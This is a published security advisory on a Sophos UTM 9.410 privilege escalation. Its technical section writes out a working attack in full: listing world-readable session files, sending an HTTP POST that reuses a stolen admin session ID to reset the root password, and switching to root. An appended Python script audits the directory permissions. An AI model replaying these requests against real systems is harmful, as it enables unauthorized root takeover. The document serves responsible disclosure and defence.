KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions

Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions
Advisory ID: KL-001-2017-020
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt


1. Vulnerability Details

    Affected Vendor: Sophos
    Affected Product: UTM 9
    Affected Version: 9.410
    Platform: Embedded Linux
    CWE Classification: CWE-280: Improper Handling of Insufficient Permissions or Privileges
    Impact: Root Access
    Attack vector: SSH


2. Vulnerability Description

    The attacker must know the password for the loginuser
    account. The confd client is not available to the loginuser
    account. However, it is possible to list a directory
    containing sub-directories whose names are valid session
    identifiers (SID) and can be used to make requests on behalf
    of other accounts, such as admin. This allows for escalation
    to root privilege.


3. Technical Description

    1. Obtain a privileged session token

    $ ssh loginuser@1.3.3.7
    loginuser@1.3.3.7's password:

    Sophos UTM
    (C) Copyright 2000-2016 Sophos Limited and others. All rights reserved.
    Sophos is a registered trademark of Sophos Limited and Sophos Group.
    All other product and company names mentioned are trademarks or registered
    trademarks of their respective owners.

    For more copyright information look at /doc/astaro-license.txt
    or http://www.astaro.com/doc/astaro-license.txt

    NOTE: If not explicitly approved by Sophos support, any modifications
          done by root will void your support.

    loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/
    loginuser@[redacted]:/var/confd/var/sessions > ls -la
    total 40
    drwxr-xr-x 2 root root 4096 Mar 23 14:53 .
    drwxr-xr-x 5 root root 4096 Mar 19 16:06 ..
    -rw-r--r-- 1 root root  359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC
    -rw-r--r-- 1 root root    5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock
    -rw-r--r-- 1 root root  369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk
    -rw-r--r-- 1 root root   35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock
    -rw-r--r-- 1 root root  367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP
    -rw-r--r-- 1 root root   10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock
    -rw-r--r-- 1 root root  370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN
    -rw-r--r-- 1 root root    5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock

    2. Set the root password

    POST /webadmin.plx HTTP/1.1
    Host: 1.3.3.7:4444
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.5.1.1
    Content-Type: application/json; charset=UTF-8
    Referer: https://1.3.3.7:4444/
    Content-Length: 418
    Cookie: SID=xZzeOIhVClqKYsmCKHrN
    DNT: 1
    Connection: close

    {"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

    HTTP/1.1 200 OK
    Date: Thu, 23 Mar 2017 14:57:19 GMT
    Server: Apache
    Expires: Thursday, 01-Jan-1970 00:00:01 GMT
    Pragma: no-cache
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Option: nosniff
    X-XSS-Protection: 1; mode=block
    Vary: Accept-Encoding
    Connection: close
    Content-Type: application/json; charset=utf-8
    Content-Length: 24690

    {"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",
    [snip]
    "_cookie":null,"wdebug":0}

    3. Look for success message.

    "objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

    4. Profit.

    loginuser@[redacted]:/home/login > su
    Password:
    [redacted]:/home/login # id
    uid=0(root) gid=0(root) groups=0(root),890(xorp)


4. Mitigation and Remediation Recommendation

    The vendor has addressed this vulnerability in version
    9.503. Release notes and download instructions can be found
    at:

    https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released


5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel)
    of KoreLogic, Inc.


6. Disclosure Timeline

    2017.07.21 - KoreLogic submits vulnerability details to Sophos.
    2017.07.21 - Sophos acknowledges receipt.
    2017.09.01 - 30 business days have elapsed since the vulnerability
                 was reported to Sophos.
    2017.09.15 - KoreLogic requests an update on the status of this and
                 other vulnerabilities reported to Sophos.
    2017.09.18 - Sophos informs KoreLogic that this issue has been
                 remediated in release 9.503 for UTM.
    2017.10.24 - KoreLogic public disclosure.


7. Proof of Concept

    See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc.
is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
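
Added example (not part of the KoreLogic advisory and not Sophos code): a permission audit for the condition shown in section 3, where a session store is mode 0755 with 0644 entries, so any local account can read entry names that double as session identifiers. The function names, the constructed sample directory and the 0700/0600 target modes are assumptions; the advisory does not describe how version 9.503 changed the permissions.

```python
import os
import stat
import tempfile

def audit_session_dir(path):
    """Report permission bits that expose a store whose entry names are session IDs."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    # o+r on the directory lets any local account enumerate entry names;
    # when the names are the tokens, listing alone discloses them.
    if mode & stat.S_IROTH:
        findings.append(("dir-listable", path, oct(mode)))
    # o+x lets other accounts open entries by name once a name is known.
    if mode & stat.S_IXOTH:
        findings.append(("dir-traversable", path, oct(mode)))
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        emode = stat.S_IMODE(os.lstat(full).st_mode)
        if emode & (stat.S_IROTH | stat.S_IWOTH):
            findings.append(("entry-world-accessible", full, oct(emode)))
    return findings

def restrict_to_owner(path):
    """Assumed remediation: 0700 on the store, 0600 on each regular entry."""
    os.chmod(path, 0o700)
    for entry in os.listdir(path):
        full = os.path.join(path, entry)
        if not os.path.islink(full):
            os.chmod(full, 0o600)

def demo():
    # Constructed stand-in for the listing in section 3 (0755 dir, 0644 files).
    store = os.path.join(tempfile.mkdtemp(), "sessions")
    os.mkdir(store)
    for name in ("EXAMPLESIDAAAAAAAAAA", "EXAMPLESIDAAAAAAAAAA.lock"):
        entry = os.path.join(store, name)
        with open(entry, "w") as fh:
            fh.write("constructed\n")
        os.chmod(entry, 0o644)
    os.chmod(store, 0o755)
    before = audit_session_dir(store)
    restrict_to_owner(store)
    return before, audit_session_dir(store)

if __name__ == "__main__":
    before, after = demo()
    for finding in before:
        print(finding)
    print("after restricting to owner:", after)
```
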